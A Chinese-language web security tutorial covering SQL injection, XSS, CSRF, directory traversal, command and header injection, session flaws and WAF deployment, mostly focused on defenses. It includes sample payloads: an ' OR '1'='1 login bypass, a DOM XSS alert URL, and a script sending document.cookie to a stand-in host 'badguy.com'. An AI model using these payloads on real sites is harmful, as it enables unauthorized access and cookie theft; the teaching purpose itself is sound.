Web网站攻击技术

news2025/1/16 14:10:43

文章目录

  • Web应用体系结构脆弱性分析
    • HTTP协议安全问题
    • Cookie的安全问题
  • 常见Web应用攻击及防范
    • SQL注入攻击及防范
      • SQL注入原理
    • 防御注入漏洞
    • 跨站脚本(XSS)攻击及防范
      • 跨站脚本(XSS)攻击原理
    • 跨站脚本攻击类型
      • 储存式XSS
      • 反射式XSS
      • DOM式XSS
    • Cookie欺骗及防范
    • CSRF攻击及防范
      • 防御CSRF攻击
    • CSRF与XSS
      • 示例与关系
      • 总结
    • 目录遍历及其防范
      • 目录遍历防御
    • 操作系统命令注入及防范
      • OS命令注入
      • OS命令注入防御
    • HTTP消息头注入攻击及防范
      • HTTP消息头注入
      • HTTP消息头注入防御
    • 其它攻击
      • 恶意文件执行
      • 防御恶意文件执行漏洞
    • 不安全的直接对象引用
      • 防御不安全的直接对象引用
    • 认证和会话管理不完善
      • 防御会话管理攻击
  • Web应用防火墙WAF
    • 基本原理
    • WAF部署
      • WAF部署:反向代理
      • WAF部署:透明代理

Web应用体系结构脆弱性分析

在这里插入图片描述

  • Web应用程序功能与安全隐患的对应关系
    在这里插入图片描述

HTTP协议安全问题

  • HTTP协议是一种简单的、无状态的应用层协议,无状态使攻击变得容易;基于ASCII码,传输的明文信息;互联网中存在的大量中间盒子,有可能导致一些新的攻击发生。
  • 中间盒子带来的HTTP安全问题

Cookie的安全问题

  • 使用Cookie的原因:解决无状态问题——保存客户服务器之间的一些状态信息。
  • Cookie是指网站为辨别用户身份、进行会话跟踪而储存在用户本地终端上的一些数据。服务器可以利用Cookie存储信息并经常性地维护这些信息,从而判断在HTTP传输中的状态。
  • Cookie的生存周期:Cookie在生成时就会被指定一个Expire值,到期自动清除。
  • 如果一台计算机上安装多个浏览器,每个浏览器都会在各自独立的空间存放Cookie。Cookie中的内容大多数经过了编码处理。
  • Cookie的一般格式
    NAME= VALUE; expires= DATE; path= PATH;domain= DOMAIN_NAME; secure
    autolog = bWlrzTpteXMxy3IzdA%3D%3D;expires=Sat, 01-Jan-2018 00:00:00 GMT; path=/;domain=victim.com
    
  • Cookie中包含敏感信息,如用户名、计算机名、使用的浏览器和曾经访问的网站等,攻击者可以利用它来进行窃密和欺骗攻击。

常见Web应用攻击及防范

  • 最普遍的注入漏洞包括:
    • SQL注入:通过SQL语句恶意地调用后台数据库
    • 系统调用
    • 通过shell命令调用外部程序

SQL注入攻击及防范

  • SQL注入:通过SQL语句恶意地调用后台数据库
  • 任何依赖于解释执行的Web应用都有被注入漏洞攻击的危险

SQL注入原理

  • 攻击者通过向应用程序的输入字段注入恶意的SQL代码,进而操纵应用程序与数据库的交互,从而窃取、篡改或删除数据。了解SQL注入的原理对防止和检测这种攻击至关重要。

  1. 用户输入未经过滤

    • 应用程序接受用户输入(如表单、URL参数、Cookie等),并将其直接插入到SQL查询中,而没有进行适当的输入验证或过滤。
  2. 构造恶意SQL语句

    • 攻击者通过在输入字段中插入特制的SQL代码,使得这些代码在与合法查询拼接时,形成恶意的SQL语句。
  3. 执行恶意查询

    • 数据库服务器执行了由拼接后的SQL语句,导致预期之外的操作,如数据泄露、数据篡改、数据库表删除等。
  • 简单的SQL注入示例:攻击者输入以下内容:
    • 用户名:' OR '1'='1
    • 密码:' OR '1'='1
  • 拼接后的SQL查询会变成:
    SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1';
    
  • 由于 '1'='1' 永远为真,查询将绕过身份验证,返回所有用户的数据。

防御注入漏洞

  • 使用特定语言的库函数来代替shell命令和系统调用
  • 对用户输入的信息进行严格检查和过滤
  • 使用“最小权限”限制数据库用户的权限

跨站脚本(XSS)攻击及防范

跨站脚本(XSS)攻击原理

  • Cross-Site Scripting (XSS)工作原理: 输入插入包含有JavaScript或其它恶意脚本
  • 嵌入JavaScript脚本的例子:
    <script>
    	window.open(http:/badguy.com/info.pl?document.cookie)
    </script>
    
  • 问题根源:不当的服务器端输入检查,从而允许用户输入可被客户端浏览器解释的脚本命令。
  • XSS是最普遍的Web程序安全问题
    在这里插入图片描述

跨站脚本攻击类型

  • 跨站脚本攻击分为:储存式跨站脚本攻击(持久性跨站脚本攻击)和反射式XSS(非持久性跨站脚本攻击)

储存式XSS

  • 储存式跨站脚本攻击(持久性跨站脚本攻击)。如果Web程序允许存储用户数据,并且存储的输入数据没有经过正确的过滤,就有可能发生这类攻击。
  • 在这种攻击模式下,攻击者并不需要利用一个恶意链接,只要用户访问储存式跨站脚本网页,那么恶意数据就将显示为网站的一部分并以受害者身份执行。

反射式XSS

  • 反射式XSS(非持久性跨站脚本攻击),是一种最常见的跨站脚本攻击类型。
  • Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
  • 在这种攻击模式下,Web程序不会存储恶意脚本,它会将未经验证的数据通过请求发送给客户端,攻击者就可以构造恶意的URL链接或表单并诱骗用户访问,最终达到利用受害者身份执行恶意代码的目的。

DOM式XSS

  • DOM式XSS攻击并不是按照“数据是否保存在服务端”划分的,它是反射式XSS的一种特例,只是由于DOM式XSS的形成原因比较特殊,因此把它单独作为一个分类。

  • 它通过操纵网页的DOM结构来注入恶意代码。与传统的反射型或存储型XSS不同,DOM式XSS不依赖于服务器端的漏洞,而是直接在客户端(浏览器)中发生。这种攻击利用JavaScript来操作DOM节点,从而注入并执行恶意脚本。

  • DOM式XSS的工作原理

  1. 注入恶意输入

    • 攻击者通过各种输入途径(如URL参数、表单输入、Hash片段等)将恶意JavaScript代码注入到网页中。
  2. 操纵DOM

    • 被注入的恶意输入被网页的JavaScript代码读取并直接用于操作DOM。这些操作可能包括修改页面内容、创建和执行新的脚本标签、改变现有DOM节点的属性等。
  3. 执行恶意脚本

    • 当网页的JavaScript执行这些操作时,注入的恶意代码被执行,导致XSS攻击。
  • 示例:假设有一个网页,通过读取URL参数并将其插入到页面中显示:
    <!DOCTYPE html>
    <html>
    <head>
        <title>DOM XSS Example</title>
        <script>
            // 获取URL参数
            var params = new URLSearchParams(window.location.search);
            var userInput = params.get('input');
    
            // 将用户输入插入到DOM中
            document.addEventListener('DOMContentLoaded', function() {
                document.getElementById('output').innerHTML = userInput;
            });
        </script>
    </head>
    <body>
        <h1>DOM XSS Example</h1>
        <div id="output"></div>
    </body>
    </html>
    
  • 攻击者可以构造一个恶意URL,如:
    http://example.com/page.html?input=<script>alert('XSS')</script>
    
  • 当用户访问这个URL时,页面中的JavaScript代码会将恶意的<script>标签插入到DOM中并执行,导致XSS攻击。

Cookie欺骗及防范

  • 伪造Cookie信息:伪造Cookie信息,绕过网站的验证过程,不需要输入密码,就可以登录网站,甚至进入网站管理后台。
  • 在本地保存Cookie可能导致保存的消息如:用户名、口令以及权限信息,泄露。
  • 安全原则:一般情况下,网站会话管理机制仅将会话ID保存至Cookie,而将数据本身保存在Web服务器的内存或文件、数据库中
  • 监听Cookie来实现会话劫持:如果Cookie中没有设置安全属性secure”,则Cookie内容在网络中用明文传输,攻击者监听到Cookie内容后可以轻松实现会话劫持

CSRF攻击及防范

  • 跨站请求仿冒(CSRF Cross Site Request Forgery)
    在这里插入图片描述
  • 现在绝大多数网站都不会使用GET请求来进行数据更新,而是采用POST来提交,即使这样,攻击者仍然能够实施CSRF攻击。

防御CSRF攻击

  • 现有银行的网银交易流程要比例子复杂得多,同时还需要USBkey、验证码、登录密码和支付密码等一系列安全信息,一般并不存在CSRF安全漏洞,安全是有保障的。
  • 措施
    1. 从Web应用程序中删除所有XSS漏洞。
    2. 在URL和表单中增加的每个请求,必须提供基本会话令牌以外的每个请求用户验证。
    3. 每次提出一个可信行为时,对发出请求的用户进行验证。
    4. 设定短暂的可信用户会话时间,完成任务后记得退出可信会话,删除所有cookie。

CSRF与XSS

类别CSRF(跨站请求伪造)XSS(跨站脚本攻击)
主要区别利用Web服务器端的漏洞利用Web客户端的漏洞
攻击目标未经授权的请求注入并执行恶意脚本
攻击方式通过伪造受信任用户的请求,强制用户在已认证的Web应用中执行不期望的操作通过将恶意脚本注入到网页中,并在用户浏览器中执行,窃取数据或劫持会话
依赖条件需要用户在已认证的状态下访问攻击页面需要找到输入点以注入恶意脚本
典型场景例如:在用户不知情的情况下,利用其身份发起转账请求例如:显示用户输入的内容而未经过滤,从而执行注入的JavaScript代码
防御措施使用CSRF令牌、验证HTTP Referer头、双重提交Cookie输入验证和过滤、使用安全的API、实施内容安全策略(CSP)
相互关系XSS攻击可以成为实施CSRF攻击的前置步骤,通过XSS获取有用的攻击信息,如用户的身份信息通过XSS攻击,攻击者可以伪造一个表单提示用户输入身份信息,进一步实施CSRF攻击

示例与关系

  • CSRF示例

    • 攻击者构造一个恶意链接或表单,诱使用户点击或提交,从而在用户已登录的情况下执行未经授权的操作,如转账、修改设置等。
  • XSS示例

    • 攻击者找到网站的输入点,如评论框,并注入恶意JavaScript代码。当其他用户访问该页面时,代码在其浏览器中执行,可能导致Cookie窃取、会话劫持等。

总结

  • 重大区别
    • CSRF主要是利用Web服务器端的漏洞,在用户不知情的情况下执行未经授权的操作。
    • XSS主要是利用Web客户端的漏洞,通过注入并执行恶意脚本,影响用户会话或窃取敏感数据。
  • 相互关系
    • XSS攻击可以作为CSRF攻击的前置步骤。通过XSS攻击,攻击者可以获取用户的身份信息并进一步构造和发送伪造请求,实施CSRF攻击。

目录遍历及其防范

  • 许多Web应用支持外界以参数的形式来指定服务器上的文件名,如果服务器在处理用户请求时不对文件名进行充分校验,就可能出问题。如:文件被非法获取;文件被篡改;文件被删除
  • 一般来说,如果Web应用产生目录遍历漏洞需要满足以下3个条件:
    1. 外界能够指定文件名
    2. 能够使用绝对路径或相对路径等形式来指定其它目录的文件名
    3. 没有对拼接后的文件名进行校验就允许访问该文件

目录遍历防御

  • 避免由外界指定文件名
  • 文件名中不允许包含目录名
  • 限定文件中仅包含字母或数字

操作系统命令注入及防范

OS命令注入

  • 很多Web应用编程语言支持应用通过Shell执行操作系统(OS)命令。通过Shell执行OS命令,或开发中用到的某个方法在其内部使用了Shell,就有可能出现恶意利用Shell提供的功能来任意执行OS命令的情况,这就是OS命令注入。
  • 攻击成功的主要原因是Shell支持连续执行多条命令,如Unix操作系统Shell中使用分号(;)或管道(|)等字符支持连续执行多条命令,Windows操作系统cmd.exe使用&符号来连接多条命令。这些符号一般称为Shell的元字符,如果OS命令参数中混入了元字符,就会使攻击者添加的操作系统命令被执行,这就是OS注入漏洞产生的原因

OS命令注入防御

OS命令注入攻击防御策略:

  1. 选择不调用操作系统命令的实现方法,即不调用Shell功能,而用其它方法实现;
  2. 避免使用内部可能会调用Shell的函数;
  3. 不将外部输入的字符串作为命令行参数;
  4. 使用安全的函数对传递给操作系统的参数进行转义,消除Shell元字符带来的威胁。由于Shell转义规则的复杂性以及其它一些环境相关的原因,这一方法有时很难完全凑效。

HTTP消息头注入攻击及防范

HTTP消息头注入

  • 在重定向或生成Cookie时,基于外部传入的参数生成HTTP响应头。
  • HTTP响应头信息一般以文本格式逐行定义消息头,即消息头之间互相以换行符隔开。攻击者可以利用这一特点,在指定重定向目标URL或Cookie值的参数中插入换行符且该换行符又被直接作为响应输出,从而在受害者的浏览器上任意添加响应消息头或伪造响应消息体

HTTP消息头注入防御

  • 不将外部传入参数作为HTTP响应消息头输出,如不直接使用URL指定重定向目标,而是将其固定或通过编号等方式来指定,或使用Web应用开发工具中提供的会话变量来转交URL;
  • 由专门的API来进行重定向或生成Cookie,并严格检验生成消息头的参数中的换行符。

其它攻击

恶意文件执行

  • 恶意文件执行漏洞也称为不安全的远程文件包含漏洞;
  • 需要用户提供输入文件名的Web程序容易受到攻击:如果对用户输入不验证,攻击者可借此操控Web程序执行系统程序或外部URL;
  • 允许上传文件给Web程序带来的危害更大

防御恶意文件执行漏洞

  • 禁止用户输入被用作输入文件片断;
  • 对于必须要用户输入文件名、URL的地方,执行严格的检查验证输入合法性

不安全的直接对象引用

  • 不安全的直接对象引用漏洞也常称为目录遍历漏洞
  • 如果访问控制配置不合理,攻击者就可以不经授权地操作这些暴露的内部对象

防御不安全的直接对象引用

  • 锁定Web目录。使得通过网络访问Web服务器的用户都不能访问除专门用于存放Web内容的目录以外的目录
  • 对于每一次对象引用都要重新验证授权
  • 禁止通过参数暴露内部对象
  • 建议使用间接映射的方法取代简单的直接对象引用

认证和会话管理不完善

  • 会话管理:Session ID。唯一地标识用户,一个ID仅用于一次认证会话,由服务器生成,服务器期待用户在下一次请求时发送同样的ID。
  • 认证和会话管理攻击流程
    在这里插入图片描述

防御会话管理攻击

  • 使用长且复杂的随机Session ID
  • 对Session ID的传输、存储进行保护,防止被泄露和劫持
  • 使用SSL时,必须保护认证和Session ID两部分的内容
  • URL查询字符串中不要包含有User/Session任何信息

Web应用防火墙WAF

  • Web应用防火墙(Web Application Firewall, WAF)是一种专门保护Web应用免受的各种Web应用攻击的安全防护系统。
  • 对每一个HTTP/HTTPS请求进行内容检测和验证,确保每个用户请求有效且安全的情况下才交给Web服务器处理,对非法的请求予以实时阻断或隔离、记录、告警等,确保Web应用的安全性。

在这里插入图片描述

  • 基本安全功能:
    • 防止常见的各类网络攻击,如:SQL注入、XSS跨站、CSRF、网页后门等
    • 防止各类自动化攻击,如:暴力破解、撞库、批量注册、自动发贴等
    • 阻止其它常见威胁,如:爬虫、0 DAY攻击、代码分析、嗅探、数据篡改、越权访问、敏感信息泄漏、应用层DDoS、盗链、越权、扫描等

在这里插入图片描述

基本原理

  • WAF主要提供对Web应用层数据的解析,对不同的编码方式做强制多重转换还原为可分析的明文,对转换后的消息进行深度分析。主要的分析方法主要有两类,一类是基于规则的分析方法,另一类是异常检测方法

WAF部署

  • WAF部署:WAF部署在Web服务器的前面,一般是串行接入,不仅在硬件性能上要求高,而且不能影响Web服务,同时还要与负载均衡、Web Cache等Web服务器前的常见产品协调部署。
  • WAF的部署模式有三种:反向代理、透明代理、旁路常用的是反向、透明两种模式,因为旁路只有监听功能,不能对访问进行拦截、没有防护能力,因此使用的较少。

WAF部署:反向代理

在这里插入图片描述

WAF部署:透明代理

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1790919.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

python图像识别库-pytesseract

内容目录 一、安装1.安装tesseract OCR1) MAC中安装2) Windows中安装3) 中文报下载 二、pytesseract的简单使用 pytesseract是python的一个用于图像提取的库, 它实际上是对Tesseract OCR引擎的封装。pytesseract使得在Python项目中调用Tesseract变得更加简便&#xff0c;主要用…

Python实现定时任务的方式

大家好&#xff0c;在当今数字化的时代&#xff0c;定时任务的需求在各种应用场景中频繁出现。无论是数据的定时更新、周期性的任务执行&#xff0c;还是特定时间点的操作触发&#xff0c;Python 都为我们提供了强大而灵活的手段来实现这些定时任务。当我们深入探索 Python 的世…

All-in-One WP Migration插件+汉化包+扩展优化版

下载地址&#xff1a;All-in-One WP Migration插件汉化包扩展优化版 此插件支持大量的 WordPress 主机&#xff0c;不用担心网站数据搬家不完全&#xff0c;它使用区块方式导入数据&#xff0c;可避免大多数主机的上传限制&#xff08;还原网站的时候&#xff09;。

C#WPF数字大屏项目实战04--设备运行状态

1、引入Livecharts包 项目中&#xff0c;设备运行状态是用饼状图展示的&#xff0c;因此需要使用livechart控件&#xff0c;该控件提供丰富多彩的图形控件显示效果 窗体使用控件 2、设置饼状图的显示图例 通过<lvc:PieChart.Series>设置环状区域 3、设置饼状图资源样…

Ubuntu系统配置DDNS-GO【笔记】

DDNS-GO 是一个基于 Go 语言的动态 DNS (DDNS) 客户端&#xff0c;用于自动更新你的 IP 地址到 DNS 记录上。这对于经常变更 IP 地址的用户&#xff08;如使用动态 IP 的家庭用户或者小型服务器&#xff09;非常有用。 此文档实验环境为&#xff1a;ubuntu20.04.6。 在Ubuntu…

bison flex 实现tiny语言的编译器

bison flex 实现tiny语言的编译器 项目地址&#xff1a;tiny-compiler 完成了词法分析&#xff0c;语法分析&#xff0c;中间代码生成&#xff0c;虚拟机执行&#xff0c;没有进行类型检查、错误处理和中间代码优化。 词法分析 %{ #include <iostream> #include "…

STM32——hal_SPI_(介绍)

SPI&#xff08;串行外围设备接口&#xff09;是一种高速的、全双工、同步的通信协议&#xff0c;通常用于短距离通信&#xff0c;尤其是在嵌入式系统中与各种外围设备进行通信。SPI接口由摩托罗拉公司推出&#xff0c;由于其简单和灵活的特性&#xff0c;它被广泛用于多种应用…

运行软件缺失vcruntime140.dll怎么办?vcruntime140.dll缺失的详细解决方法分享

vcruntime140.dll 是一个动态链接库文件&#xff0c;它是 Microsoft Visual C Redistributable Package 的一部分&#xff0c;为使用 Visual C 编译器开发的应用程序提供必要的运行时环境。该文件包含了大量应用程序运行时需要调用的库函数&#xff0c;这些函数是实现 C 标准库…

基于GFlowNets的蚁群抽样组合优化

本文将基于GFACS论文&#xff0c;探讨其核心思想、技术细节以及在实际应用中的优势。 GFlowNet&#xff1a;摊销MCMC成本的有效工具 GFACS的核心是GFlowNet&#xff0c;它通过训练学习状态转移的概率分布&#xff0c;从而替代传统的MCMC采样方法。GFlowNet的优势在于&#xff1…

真实场景 这周的任意一天,获取上周一到周日的时间范围-作者:【小可耐教你学影刀RPA】

用户场景 我想在这周的任意一天&#xff0c;获取上周一到周日的时间范围&#xff0c;应该怎么做 解决办法1 用指令解决 最简单 解决办法2 自己写逻辑 不过要用到 获取当前日期指令 当前是礼拜几

在 JavaScript 中实现数据加密与解密:Web Cryptography API 与 CryptoJS详解

在 JavaScript 中&#xff0c;可以使用 Web Cryptography API 或第三方库如 crypto-js 来实现加密和解密。本文将介绍如何使用这两种方法在客户端进行数据的加密和解密。 使用 Web Cryptography API Web Cryptography API 是现代浏览器提供的一个强大、原生的加密 API。它允许…

【AI大模型】Transformers大模型库(二):AutoModelForCausalLM

目录​​​​​​​ 一、引言 二、AutoModelForCausalLM 2.1 概述 2.2 主要功能 2.3 代码示例 三、总结 一、引言 这里的Transformers指的是huggingface开发的大模型库&#xff0c;为huggingface上数以万计的预训练大模型提供预测、训练等服务。 &#x1f917; Transfo…

【Web API DOM10】日期(时间)对象

一&#xff1a;实例化 1 获取系统当前时间即创建日期对象 const date new Date() console.log(date) 2024年6月5日周三 2 获取指定的时间 以获取2025年6月29日为例 const date new Date(2025-6-29) console.log(date) 二&#xff1a;日期对象方法 1 使用场景&#xf…

代码随想录算法训练营第二十五天| 216. 组合总和 III、17. 电话号码的字母组合

[LeetCode] 216. 组合总和 III [LeetCode] 216. 组合总和 III 文章解释 [LeetCode] 216. 组合总和 III 视频解释 题目: 找出所有相加之和为 n 的 k 个数的组合&#xff0c;且满足下列条件&#xff1a; 只使用数字1到9每个数字 最多使用一次 返回 所有可能的有效组合的列表 。该…

AI视频教程下载:给初学者的ChatGPT提示词技巧

你是否厌倦了花费数小时在可以通过强大的语言模型自动化的琐碎任务上&#xff1f;你是否准备好利用 ChatGPT——世界上最先进的语言模型——并将你的生产力提升到下一个水平&#xff1f; ChatGPT 是语言处理领域的游戏规则改变者&#xff0c;它能够理解并响应自然语言&#xf…

Vue01-vue的简介

一、Vue是什么&#xff1f; 一套用于构建用户界面的渐进式javaScript框架。 构建用户界面&#xff1a; 渐进式&#xff1a; 目前Vue的地位&#xff1a;生态完善&#xff0c;国内前端工程师必备技能。 二、Vue的特点 一个XXX.vue就是一个组件&#xff0c;封装的概念&#xff0c…

Spring系列-SpringMvc父子容器启动原理解析

1、Spring整合SpringMVC 特性&#xff1a; 说到Spring整合SpringMVC唯一的体现就是父子容器&#xff1a; 通常我们会设置父容器&#xff08;Spring&#xff09;管理Service、Dao层的Bean, 子容器(SpringMVC)管理Controller的Bean .子容器可以访问父容器的Bean, 父容器无法访…

面向长文本处理的键值缓存压缩技术:智能压缩,无损性能,免微调

随着输入长度的增加&#xff0c;大型语言模型&#xff08;LLMs&#xff09;中的键值&#xff08;KV&#xff09;缓存需要存储更多的上下文信息以维持性能&#xff0c;这导致内存消耗和计算时间急剧上升。KV缓存的增长对内存和时间效率的挑战主要表现在两个方面&#xff1a;一是…

【数据库初阶】SQL--DCL

文章目录 DCL1. 基本介绍2. 用户管理2.1 查询用户2.2 创建用户2.3 修改用户密码2.4 删除用户 3. 权限控制3.1 查询权限3.2 授予权限3.3 撤销权限 4. DCL总结 DCL 更多数据库MySQL系统内容就在以下专栏&#xff1a; 专栏链接&#xff1a;数据库MySQL 1. 基本介绍 DCL英文全称是…